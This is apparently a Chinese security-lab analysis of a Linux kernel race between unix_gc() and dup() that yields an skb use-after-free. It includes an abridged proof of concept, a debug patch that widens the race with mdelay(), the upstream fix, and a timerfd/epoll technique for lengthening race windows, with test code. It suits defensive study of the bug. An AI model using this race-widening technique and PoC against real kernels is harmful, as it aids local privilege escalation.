Linux 内核利用技巧 Racing against the clock

author: 熊潇 of IceSword Lab

概述

原文: Racing against the clock – hitting a tiny kernel race window

  • Part.1: 漏洞原理简述
  • Part.2: 对比较容易产生疑惑的地方增加了细节说明
  • Part.3: 针对文中提高 race 的技巧做了分析

Part.1

The bug & race

The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero.

  • unix_gc() 的预期逻辑是: total_refs 和 inflight_refs 相同就可以认为此时 file 是单独占有的,就可以把 skb 和 file 一起 free 掉
  • 下面代码 (3) 在 (1) 和 (2)中间执行则 race 成功
  • 如果 race 没有成功,__fget_files 那里就会发现 f_count 是 0 或者 file 是 NULL
  • 但是如果 race 成功的话,file->f_count 在 __fget_files() 中会被加 1 ,在 unix_gc 后面的代码中就不会被释放 file 的内存,而只是把 f_count 减 1,这也意味着在 close() 之后依然可以 dup() 成功
1
2
3
4
5
6
7
8
9
10
11
12
13
dup() -> __fget_files()
file = files_lookup_fd_rcu(files, fd); // fdt->fd[fd] (1)
...
get_file_rcu_many(file, refs) // update: f_count+1 (2)

close() -> unix_gc()
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
total_refs = file_count(u->sk.sk_socket->file); // read f_count: 1 (3)
inflight_refs = atomic_long_read(&u->inflight); // inflight_refs: 1
...
if (total_refs == inflight_refs) { // compare
list_move_tail(&u->link, &gc_candidates);
...

unix_gc() 中 file 和 skb 没有同步释放可能造成的影响?

下面这个方式可以触发 skb UAF:

1
2
3
4
5
6
socketpair() // 获取 socket pair fds: 3, 4
sendmsg(4, 3) // 通过 fd 4 发送 fd 3
-> skb_queue_tail(&other->sk_receive_queue, skb); // other 是 fd 4 的 peer 也就是 fd 3, skb 保存了 fd 4 发送的内容也是 fd 3
close(3) | dup(3) // close 和 dup 存在 race,dup 如果 race 成功会返回 fd 3
recvmsg(3) // 通过 fd 3 接收 fd 4 发送的 skb
-> last = skb = skb_peek(&sk->sk_receive_queue); // 此时 skb 对应的内存已经被 free 了

skb uaf:

  • allocated in: sendmsg() -> unix_stream_sendmsg()
  • freed in: close() -> unix_gc()
  • uafed in: recvmsg() -> unix_stream_read_generic()

Part.2

SCM_RIGHTS unix socket

SCM_RIGHTS is a socket control message used for passing file descriptors between processes over a UNIX domain socket.

It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.

  • example

    • sender.c

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <errno.h>
      #include <sys/un.h>

      /*
       * Sender side of the SCM_RIGHTS demo.
       *
       * Opens the file named by argv[1] read-only and passes its descriptor,
       * together with a 5-byte "hello" payload, over the UNIX stream socket
       * bound at /tmp/file_transfer.sock.
       *
       * Returns 0 on success, 1 on a usage error or any failed system call.
       */
      int main(int argc, char *argv[]) {
          if (argc < 2) {
              printf("Usage: %s <file_path>\n", argv[0]);
              return 1;
          }

          char *file_path = argv[1];

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);
          if (sock == -1) {
              perror("socket");
              return 1;
          }

          struct sockaddr_un addr;
          memset(&addr, 0, sizeof(addr));
          addr.sun_family = AF_UNIX;
          /* addr was zeroed and one byte is held back, so sun_path stays NUL-terminated. */
          strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

          if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
              perror("connect");
              close(sock);
              return 1;
          }

          int fd = open(file_path, O_RDONLY);
          if (fd == -1) {
              perror("open");
              close(sock);
              return 1;
          }

          /*
           * Ancillary-data buffer. The union forces struct cmsghdr alignment,
           * which a bare char array does not guarantee (see cmsg(3)).
           */
          union {
              char buf[CMSG_SPACE(sizeof(int))];
              struct cmsghdr align;
          } control;
          memset(&control, 0, sizeof(control));

          struct msghdr msg = {0};
          struct iovec io = { .iov_base = "hello", .iov_len = 5 };
          msg.msg_iov = &io;
          msg.msg_iovlen = 1;

          msg.msg_control = control.buf;
          msg.msg_controllen = sizeof(control.buf);

          struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
          cmsg->cmsg_level = SOL_SOCKET;
          cmsg->cmsg_type = SCM_RIGHTS;
          cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
          /* CMSG_DATA() is not guaranteed to be int-aligned; copy instead of casting. */
          memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));

          if (sendmsg(sock, &msg, 0) == -1) {
              perror("sendmsg");
              close(fd);
              close(sock);
              return 1;
          }

          close(fd);
          close(sock);

          return 0;
      }
    • recver.c

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <errno.h>
      #include <sys/un.h>

      /*
       * Receiver side of the SCM_RIGHTS demo.
       *
       * Listens on the UNIX stream socket /tmp/file_transfer.sock, accepts one
       * connection, receives one message carrying a file descriptor as
       * SCM_RIGHTS ancillary data, and copies the content readable from that
       * descriptor to stdout.
       *
       * Returns 0 on success, 1 on any failed system call or malformed message.
       */
      int main(int argc, char *argv[]) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);
          if (sock == -1) {
              perror("socket");
              return 1;
          }

          struct sockaddr_un addr;
          memset(&addr, 0, sizeof(addr));
          addr.sun_family = AF_UNIX;
          /* addr was zeroed and one byte is held back, so sun_path stays NUL-terminated. */
          strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

          /*
           * Remove a socket file left behind by a previous run; otherwise bind()
           * fails with EADDRINUSE. A failure here (e.g. ENOENT) is harmless.
           */
          (void) unlink(addr.sun_path);

          if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
              perror("bind");
              close(sock);
              return 1;
          }

          if (listen(sock, 1) == -1) {
              perror("listen");
              close(sock);
              return 1;
          }

          int client_sock = accept(sock, NULL, NULL);
          if (client_sock == -1) {
              perror("accept");
              close(sock);
              return 1;
          }

          char buf[256];
          struct iovec io = { .iov_base = buf, .iov_len = sizeof(buf) };
          struct msghdr msg = {
              .msg_iov = &io,
              .msg_iovlen = 1
          };

          /*
           * Ancillary-data buffer. The union forces struct cmsghdr alignment,
           * which a bare char array does not guarantee (see cmsg(3)).
           */
          union {
              char buf[CMSG_SPACE(sizeof(int))];
              struct cmsghdr align;
          } control;
          msg.msg_control = control.buf;
          msg.msg_controllen = sizeof(control.buf);

          if (recvmsg(client_sock, &msg, 0) == -1) {
              perror("recvmsg");
              close(client_sock);
              close(sock);
              return 1;
          }

          /* Accept only a SOL_SOCKET/SCM_RIGHTS header large enough to hold one fd. */
          struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
          if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
              cmsg->cmsg_type != SCM_RIGHTS ||
              cmsg->cmsg_len < CMSG_LEN(sizeof(int))) {
              printf("Invalid message\n");
              close(client_sock);
              close(sock);
              return 1;
          }

          /* CMSG_DATA() is not guaranteed to be int-aligned; copy instead of casting. */
          int fd;
          memcpy(&fd, CMSG_DATA(cmsg), sizeof(fd));
          if (fd == -1) {
              /* errno carries no information here, so perror() would mislead. */
              fprintf(stderr, "No file descriptor received\n");
              close(client_sock);
              close(sock);
              return 1;
          }

          // Do something with the received file descriptor
          char buf2[256];
          ssize_t bytes_read;
          while ((bytes_read = read(fd, buf2, sizeof(buf2))) > 0) {
              /* read() does not NUL-terminate; emit exactly the bytes received. */
              fwrite(buf2, 1, (size_t) bytes_read, stdout);
          }
          if (bytes_read == -1) {
              perror("read");
          }

          close(fd);
          close(client_sock);
          close(sock);

          return 0;
      }

Unix socket sendmsg() and recvmsg()

  • 用于发送和接收 SCM_RIGHTS unix socket 数据的主要处理函数是: unix_stream_sendmsg 和 unix_stream_read_generic
  • 特殊的地方在于:
    • sendmsg 的时候会创建 skb 并放在全局列表 gc_inflight_list 和接收端的 sk_receive_queue
    • 发送的 fd 对应的 file 会绑定到 skb 上(f_count 也会加 1)
    • recvmsg 的时候从 sk_receive_queue 取 skb
    • unix_gc 则从 gc_inflight_list 取 skb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// net/socket.c
sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec()
-> // sock->ops->sendmsg
unix_stream_sendmsg() // struct unix_stream_ops
**__scm_send()**
scm_fp_copy()
fget_raw(fd)
...
__fget_files() // 每个被传递的 fd 引用加 1
other = unix_peer(sk);
skb = sock_alloc_send_pskb()
**unix_scm_to_skb()**
unix_attach_fds() // fd 与 skb 绑定
unix_inflight()
list_add_tail(&u->link, &**gc_inflight_list**); // unix_gc 处理的队列
**skb->destructor = unix_destruct_scm;** // 注册 skb destruct
**** skb_queue_tail(&other->**sk_receive_queue**, skb); // skb 直接放到 peer 的 sk_receive_queue 队列上
1
2
3
4
5
6
7
8
9
10
11
12
13
recvmsg() -> __sys_recvmsg() -> ...
-> // sock->ops->recvmsg
unix_stream_recvmsg()
unix_stream_read_generic()
last = skb = skb_peek(&sk->sk_receive_queue);// 取 skb
scm_recv() // 处理 fd
scm_detach_fds()
receive_fd_user() // 接收 fd
..
fd_install(new_fd, get_file(file));
__scm_destroy() // 释放 skb 绑定的 fd 引用
fput()
fput_many()

**struct sk_buff *skb, struct unix_sock *u, struct socket *sock, struct sock *sk 和 struct file *file 之间的关系?**

1
2
3
4
5
6
7
8
9
struct socket *sock = &container_of(file->f_inode, 
struct socket_alloc, vfs_inode)->socket
struct sock *sk = sock->sk

struct unix_sock *u = (struct unix_sock *)sk

struct file *file = u->sk.sk_socket->file

struct file *file = (*(struct unix_skb_parms *)&((skb)->cb)).fp->fp[i]

unix_gc() 做了什么?

  • 遍历 gc_inflight_list 获取 unix_sock 对象
    • 把满足条件的 unix_sock 添加到 gc_candidates
    • 条件:unix_sock 的文件引用和 skb 引用值相同
  • 遍历 gc_candidates
    • 把满足条件的 skb 添加到 hitlist
  • 释放 hitlist 上的 skb 内存和与之绑定的 struct file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
unix_gc()
struct sk_buff_head hitlist;
...
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
total_refs = file_count(u->sk.sk_socket->file);
inflight_refs = atomic_long_read(&u->inflight);
if (total_refs == inflight_refs) {
list_move_tail(&u->link, &gc_candidates);
}
...

skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);
scan_inflight(&u->sk, func, hitlist);
__skb_queue_tail(hitlist, skb);
...
__skb_queue_purge(&hitlist);
kfree_skb(skb);

unix_gc() 中 file 和 skb 在哪里 free ?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
unix_gc()
...
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link) // 从gc_candidates取skb到hitlist
scan_children(&u->sk, inc_inflight, NULL);
scan_inflight(&u->sk, func, hitlist);
__skb_queue_tail(hitlist, skb);
...
__skb_queue_purge(&hitlist); // (4)
kfree_skb(skb);
...
**skb->destructor() // 在 sendmsg 设置
unix_destruct_scm()**
scm_destroy()
__scm_destroy()
**fput() // 如果 f_count 是 1 则减到 0 然后释放 file**
kfree_skbmem()
**kmem_cache_free(.., skb) // 释放 skb**

// unix_destruct_scm 在 sendmsg 设置
sendmsg()
__sys_sendmsg()
sock_sendmsg()
sock_sendmsg_nosec()
unix_stream_sendmsg() // struct unix_stream_ops
skb = sock_alloc_send_pskb()
unix_scm_to_skb()
**skb->destructor = unix_destruct_scm;**

unix_gc() 何时被调用?

  • close() 可以间接触发
    • 具体入口的 syscall_exit_to_user_mode() - __fput()
  • sendmsg() 也可以触发但只在队列满的时候
    • sendmsg() - wait_for_unix_gc()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// close() 一个 f_count 为 1 的文件时触发
close()
close_fd()
filp_close()
fput()
fput_many(file, 1);
atomic_long_sub_and_test(refs, &file->f_count)
init_task_work(&file->f_u.fu_rcuhead, ____fput)
task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
entry_SYSCALL_64
do_syscall_64
syscall_exit_to_user_mode
...
tracehook_notify_resume
task_work_run()
__fput()
sock_close() // (struct file *) ->f_op->release()
__sock_release()
unix_release() // (struct socket *) ->ops->release()
unix_release_sock()
**unix_gc()**
1
2
3
4
5
6
7
// 只有 inflight sockets 超过 UNIX_INFLIGHT_TRIGGER_GC(16000) 才会调用
sendmsg()
...
unix_stream_sendmsg()/unix_dgram_sendmsg()
wait_for_unix_gc()
if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
**unix_gc();**

dup() 的作用和实现原理?

  • 根据 fd 从 fd table 中获取 struct file *file
  • 如果 f_count 不为 0 则 file->f_count += 1
  • fd table 中新建一个条目指向 file
1
2
3
4
5
6
7
8
9
SYSCALL_DEFINE1(dup, unsigned int, fildes)
fget_raw()
__fget(fd, FMODE_PATH, 1)
__fget_files(current->files, fd, mask, refs)
file = files_lookup_fd_rcu(files, fd);// 根据 fd 从 fd table 中获取 struct file *file
get_file_rcu_many(file, refs)
atomic_long_add_unless(&(x)->f_count, (cnt), 0) // if not 0, file->f_count += 1
get_unused_fd_flags()
fd_install() // fd table 中新建一个条目指向 file

close() 的作用和实现原理?

  • 使 fd 重新可用
  • 把 fd table 中 fd 对应的条目删除(设置为 NULL)
  • fd table 中原来指向的 struct file 的 f_count 减 1,如果减到 0 则释放 struct file 的内存
  • close 不一定会立马释放 struct file, 但是用户态不能再访问该 fd,比如dup(fd),read(fd) ..
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
close()
close_fd()
pick_file()
fdt = files_fdtable(files);
file = fdt->fd[fd];
**rcu_assign_pointer(fdt->fd[fd], NULL); // fd table 中 fd 对应的条目删除
__put_unused_fd(files, fd); // 使 fd 重新可用**
filp_close()
**fput()**
fput_many(file, 1); // fd table 中原来指向的 struct file 的 f_count 减 1
atomic_long_sub_and_test(refs, &file->f_count)
**init_task_work(&file->f_u.fu_rcuhead, ____fput)**
task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)

____fput()
__fput()
file_free()
file_free_rcu()
**kmem_cache_free(filp_cachep, f) // 如果减到 0 则释放 struct file 的内存**

增加 kernel delay patch 的 poc 如何 work ?

  • line-27 将 pair[0] 的 f_count +1 并添加到 gc_inflight_list 和 sk_receive_queue
  • line-29 和 line-43 用于触发 unix_gc() 调用, 因为需要 close() 一个 f_count 为 1 的 fd
  • line-36 用于等待 resurrect_fn()->dup()->__fget_files() 调用进入 race window 拿到 struct file , 因为 line-37 会把 pair[0] 从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms
  • line-43 会在 __fget_files() 等待的期间执行 unix_gc() , 在执行到准备释放 skb 的代码时,会等待 line-11 的 dup() 完成。
  • dup() 完成后执行到 line-16 的 recvmsg() ,内核会等待 line-43 触发的 unix_gc() 完成 skb 的释放
  • unix_gc() 完成后,recvmsg() 继续执行拿到被释放的 skb,UAF

省略版 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
1 void send_fd(int sock, int fd) {
2 ...
3 sendmsg(sock, &msg, 0);
4 }
5
6 int resurrect_fd = -1;
7 int resurrected_fd = -1;
8
9 void *resurrect_fn(void *arg) {
10 prctl(PR_SET_NAME, "SLOW-ME"); // tell kernel to inject mdelay()
11 resurrected_fd = dup(resurrect_fd);
12 prctl(PR_SET_NAME, "resurrect");
13
14 prctl(PR_SET_NAME, "SLOW-RECV");
15 ...
16 int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);
17 prctl(PR_SET_NAME, "resurrect");
18
19 return NULL;
20 }
21
22 int main(void) {
23 /* create socketpair */
24 int pair[2];
25 socketpair(AF_UNIX, SOCK_STREAM, 0, pair);
26
27 send_fd(pair[1], pair[0]);
28
29 int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
30
31 resurrect_fd = pair[0];
32
33 pthread_t resurrect_thread;
34 pthread_create(&resurrect_thread, NULL, resurrect_fn, NULL);
35
36 usleep(100000); /* wait for fget_raw() to see pointer */
37 close(pair[0]);
38
39 /*
40 * trigger unix GC; has to read file_count() before file inc
41 * but do hitlist kill after file inc
42 */
43 close(trigger_sock);
44
45 /* make sure dup() has really finished */
46 pthread_join(resurrect_thread, NULL);
47
48 }

kernel patch 增加三个 mdelay

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
@@ -850,6 +852,13 @@ static struct file *__fget_files(struct files_struct *files, unsigned int fd,
loop:
file = files_lookup_fd_rcu(files, fd);
if (file) {
+ if (strcmp(current->comm, "SLOW-ME") == 0) {
+ pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n",
+ fd, (unsigned long)file, file_count(file));
**+ mdelay(500);**
+ pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n",
+ fd, (unsigned long)file, file_count(file));
+ }

...
@@ -2631,6 +2633,12 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
last = skb = skb_peek(&sk->sk_receive_queue);
last_len = last ? last->len : 0;

+ if (strcmp(current->comm, "SLOW-RECV") == 0) {
+ pr_warn("recvmsg: delaying stream receive\n");
+ mdelay(500);
+ pr_warn("recvmsg: delayed stream receive\n");
+ }
+
...
@@ -210,8 +212,11 @@ void unix_gc(void)
...
skb_queue_head_init(&hitlist);
+ if (strcmp(current->comm, "resurrect") == 0) {
+ pr_warn("unix: delaying hitlist setup\n");
+ mdelay(500);
+ pr_warn("unix: hitlist setup delay done\n");
+ }
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);

fixed patch 如何 work ?

  • 补丁效果:在 race window 期间,如果 fd 对应的 struct file 已经从 fd table 移除,则回退对 f_count 的操作,如果发现回退后变为 0 则直接释放 struct file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
diff --git a/fs/file.c b/fs/file.c
index 8627dacfc4246..ad4a8bf3cf109 100644
--- a/fs/file.c
+++ b/fs/file.c
@@ -858,6 +858,10 @@ loop:
file = NULL;
else if (!get_file_rcu_many(file, refs))
goto loop;
+ else if (files_lookup_fd_raw(files, fd) != file) {
+ fput_many(file, refs);
+ goto loop;
+ }
}
rcu_read_unlock();

Part.3

如何利用 hrtimer 扩大 race 成功率?

  • timerfd_create + timerfd_settime 可以在指定时间(纳秒)后触发 timer interrupt
  • timer interrupt handler 会调用 __wake_up_common 遍历 wait queue 并执行回调函数。这意味着 wait queue 越长,处在 interrupt context 的时间越长
  • 利用这一点可以让进程在 race window 中被中断,然后在另一个 CPU 上运行需要与之 race 的进程

wait queue item 在哪里添加和读取 ?

  • 每一个 EPOLL_CTL_ADD 会在 timer_fd 的 wait queue 上添加一个执行 ep_poll_callback 的 entry
  • timerfd_triggered 中 从 timer_fd 的 wait queue 中取出 entry
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j]

do_epoll_ctl() // 在 ep_ptable_queue_proc 中添加 wait_queue_enty
ep_insert(struct eventpoll *ep, ..
struct ep_pqueue epq;
init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); // epq.pt._qproc = **ep_ptable_queue_proc**
ep_item_poll(epi, &epq.pt, 1);
vfs_poll
timerfd_poll // struct file_operations timerfd_fops.poll
struct timerfd_ctx *ctx = file->private_data;
poll_wait(file, &ctx->wqh, wait); // &ctx->wqh: whead, wait: &epq.pt, (include/linux/poll.h)
**ep_ptable_queue_proc**(struct file *file, wait_queue_head_t *whead, poll_table *pt)
struct epitem *epi = ep_item_from_epqueue(pt);
struct eppoll_entry *pwq;
...
pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
...
**init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);**
...
**add_wait_queue(whead, &pwq->wait); // whead:** &ctx->wqh
...

struct ep_pqueue {
poll_table pt;
struct epitem *epi;
}

struct poll_table_struct {
poll_queue_proc _qproc; // void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)
__poll_t _key;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
local_apic_timer_interrupt()
**hrtimer_interrupt()**
...
timerfd_tmrproc()
**timerfd_triggered()**
**spin_lock_irqsave(&ctx->wqh.lock, flags);** // 关中断
**** ctx->expired = 1;
ctx->ticks++;
wake_up_locked_poll(**&ctx->wqh**, EPOLLIN);
**__wake_up_common() // 遍历 wait queue, 执行 callback**
wait_queue_entry_t *curr, *next;
**list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)**
ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback
spin_unlock_irqrestore(&ctx->wqh.lock, flags);

**timerfd_tmrproc 在 timerfd_setup 中设置**

1
2
3
4
5
6
static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
const struct itimerspec64 *ktmr)
..
hrtimer_init(&ctx->t.tmr, clockid, htmode);
hrtimer_set_expires(&ctx->t.tmr, texp);
ctx->t.tmr.function = timerfd_tmrproc;

**struct timerfd_ctx, struct file , struct hrtimer 之间的关系**

1
2
3
4
5
struct timerfd_ctx *ctx = file->private_data;

struct hrtimer *htmr = &ctx->t.tmr;

struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, t.tmr);

测试代码:

向 wait queue 中添加 500 * 500 个 entry

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/timerfd.h>
#include <sched.h>
#include <err.h>

/*
 * SYSCHK(x): evaluate x exactly once and yield its value.
 * If the value equals -1 (cast to x's own type), the program terminates via
 * err(1, ...) with the stringified expression "SYSCHK(<x>)" as the message.
 * Relies on the GNU statement-expression and typeof extensions.
 */
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

/* Number of epoll instances the test creates. */
#define NUM_EPOLL_INSTANCES 500
/* Number of dup()ed descriptors that refer to the single timerfd. */
#define NUM_DUP_FDS 500
/* Total EPOLL_CTL_ADD registrations: every duplicate is added to every epoll instance. */
#define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)

#define NSEC_PER_SEC 1000000000UL // 1s = 1000000000ns

/*
 * Restrict the task identified by pid to the single CPU `cpu`.
 * Builds a one-CPU affinity mask and applies it with sched_setaffinity();
 * a failure terminates the program through SYSCHK.
 */
void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
/* SYSCHK stringifies this call into its error message, so the expression text is part of the output. */
SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
/*
 * Pin the caller to `cpu`: forwards to pin_task_to() with pid 0, which
 * sched_setaffinity(2) documents as "the calling thread".
 */
void pin_to(int cpu)
{
    pin_task_to(0, cpu);
}

/*
 * Return the current CLOCK_MONOTONIC time.
 * The clock_gettime() result is checked with SYSCHK, so the function never
 * returns an uninitialized timespec: on failure the program exits instead.
 */
struct timespec get_mono_time(void) {
    struct timespec ts;

    SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
    return ts;
}

/*
 * Advance *ts by nsecs nanoseconds.
 *
 * Whole seconds contained in nsecs are carried into tv_sec first, so any
 * nsecs value is handled, not only values up to one second. The result has
 * tv_nsec in [0, NSEC_PER_SEC), assuming *ts was normalized on entry.
 */
void ts_add(struct timespec *ts, unsigned long nsecs) {
    ts->tv_sec += nsecs / NSEC_PER_SEC;
    ts->tv_nsec += nsecs % NSEC_PER_SEC;
    /* Two sub-second parts can overflow by at most one second. */
    if (ts->tv_nsec >= NSEC_PER_SEC) {
        ts->tv_sec++;
        ts->tv_nsec -= NSEC_PER_SEC;
    }
}

/*
 * Wait-queue stress test.
 *
 * Creates NUM_EPOLL_INSTANCES epoll instances and NUM_DUP_FDS duplicates of
 * one timerfd, registers every duplicate with every epoll instance, arms the
 * timer one second ahead (absolute CLOCK_MONOTONIC time), waits until each
 * epoll instance reports an event, then reads and prints the timerfd counter.
 *
 * Returns 0 on success, 1 if any system call fails.
 */
int main() {
    pin_to(0);
    int timerfd = timerfd_create(CLOCK_MONOTONIC, 0);
    if (timerfd < 0) {
        perror("timerfd_create");
        return 1;
    }

    /* Create the epoll instances. */
    int epoll_fds[NUM_EPOLL_INSTANCES];
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        epoll_fds[i] = epoll_create1(0);
        if (epoll_fds[i] < 0) {
            perror("epoll_create1");
            return 1;
        }
    }

    /* Duplicate the timer fd. */
    int timer_fds[NUM_DUP_FDS];
    for (int i = 0; i < NUM_DUP_FDS; i++) {
        timer_fds[i] = dup(timerfd);
        if (timer_fds[i] < 0) {
            perror("dup");
            return 1;
        }
    }

    /* Register every duplicate with every epoll instance (EPOLL_CTL_ADD). */
    struct epoll_event ev = { 0 };
    ev.events = EPOLLIN;
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        for (int j = 0; j < NUM_DUP_FDS; j++) {
            ev.data.fd = timer_fds[j];
            if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < 0) {
                perror("epoll_ctl");
                return 1;
            }
        }
    }

    struct timespec base_time = get_mono_time();

    struct itimerspec timer_value = { .it_value = base_time };
    ts_add(&timer_value.it_value, 1000 * 1000 * 1000); // timer at +1s

    if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL) < 0) {
        perror("timerfd_settime");
        return 1;
    }

    /* Block on each epoll instance in turn until it reports an event. */
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        int nfds = epoll_wait(epoll_fds[i], &ev, 1, -1);
        if (nfds < 0) {
            perror("epoll_wait");
            return 1;
        }
    }

    /*
     * timerfd_create(2): read() returns an 8-byte expiration counter and
     * fails if the buffer is smaller, so use a type that is at least 64 bits
     * wide and verify the transfer size.
     */
    unsigned long long value = 0;
    if (read(timerfd, &value, sizeof(value)) != (ssize_t) sizeof(value)) {
        perror("read");
        return 1;
    }
    printf("value: %llu\n", value);

    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        close(epoll_fds[i]);
    }
    for (int i = 0; i < NUM_DUP_FDS; i++) {
        close(timer_fds[i]);
    }
    close(timerfd);
    return 0;

}

如何观测延迟效果?

在 GDB 中可以查看队列中的 entry,数量与设置的一致

1
2
3
4
5
6
7
8
b timerfd_triggered
set $head = &ctx.wqh.head
set $node = $head
while $node.next != $head
p $node.next
set $node = $node.next
end
p *$head

加一点 patch 用 rdtsc 可以粗略测量一下延迟效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
**0xffffffff81b8b67e <+49>:	rdtsc**
0xffffffff81b8b680 <+51>: shl rdx,0x20
0xffffffff81b8b684 <+55>: or rax,rdx
0xffffffff81b8b687 <+58>: lea r12,[rbx+0x88]
0xffffffff81b8b68e <+65>: mov r14,rax
0xffffffff81b8b691 <+68>: mov rdi,r12
0xffffffff81b8b694 <+71>: call 0xffffffff81bde9d0 <_raw_spin_lock_irqsave>
0xffffffff81b8b699 <+76>: inc QWORD PTR [rbx+0xa0]
0xffffffff81b8b6a0 <+83>: mov edx,0x1
0xffffffff81b8b6a5 <+88>: mov rdi,r12
0xffffffff81b8b6a8 <+91>: mov WORD PTR [rbx+0xac],0x1
0xffffffff81b8b6b1 <+100>: mov r13,rax
0xffffffff81b8b6b4 <+103>: mov esi,0x3
